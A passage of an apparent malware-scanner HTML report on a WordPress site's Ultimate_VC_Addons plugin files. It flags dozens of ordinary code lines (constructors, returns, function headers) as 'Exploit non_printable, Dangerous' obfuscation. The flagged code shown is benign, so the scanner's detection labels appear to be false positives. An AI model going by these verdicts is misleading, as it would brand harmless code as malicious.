<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Spacer</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Spacer' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Spacer </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Spacer Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacer_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Spacer Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Spacer module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Spacer Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacer_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_444").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_icon_manager.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 30.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 40</span><br><table id="file_445" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$created</span><span style="color: #007700">; } } } </span><span style="color: #0000BB">$AIO_Icon_Manager </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Icon_Manager</span><span style="color: #007700">(); </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_ajax_smile_ajax_add_zipped_font'</span><span style="color: #007700">, array( </span><span style="color: #0000BB">$AIO_Icon_Manager</span><span style="color: #007700">, </span><span style="color: #DD0000">'add_zipped_font' </span><span style="color: #007700">) );</span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_ajax_smile_ajax_remove_zipped_font'</span><span style="color: #007700">, array( </span><span style="color: #0000BB">$AIO_Icon_Manager</span><span style="color: #007700">, </span><span style="color: #DD0000">'remov</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Icon Manager</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Icon Manager</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 133</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_icon_manager</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$icon </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 182</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 206</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_manager_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_manager_dashboard</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 290</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_font_manager</span><span style="color: #007700">( </span><span style="color: #0000BB">$id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_font_set</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 431</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_zipped_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_zipped_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 494</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">zip_flatten</span><span style="color: #007700">( </span><span style="color: #0000BB">$zipfile</span><span style="color: #007700">, </span><span style="color: #0000BB">$filter </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 542</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_config</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">write_config</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">re_write_css</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 684</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rename_files</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">RestrictedFunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">file_ops_rename</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 702</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rename_folder</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 721</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_folder</span><span style="color: #007700">( </span><span style="color: #0000BB">$new_name </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 727</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">RestrictedFunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">file_ops_unlink</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">RestrictedFunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">directory_rmdir</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 743</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_all_fonts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 761</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_font</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_font</span><span style="color: #007700">( </span><span style="color: #0000BB">$font </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 809</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_svg</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 823</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_iconfont_list</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 825</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$iconlist</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$font_configs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 853</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">AIO_move_fonts</span><span style="color: #007700">() { </span><span style="color: #FF8000">// @codingStandardsIgnoreLine.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 879</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'smile_backend_create_folder' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 888</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smile_backend_create_folder</span><span style="color: #007700">( &</span><span style="color: #0000BB">$folder</span><span style="color: #007700">, </span><span style="color: #0000BB">$addindex </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 895</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$created</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_445").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_fancy_text.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.26 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 17</span><br><table id="file_446" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_FancyText</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Fancytext' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Fancytext </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Fancy Text Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Fancy Text module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
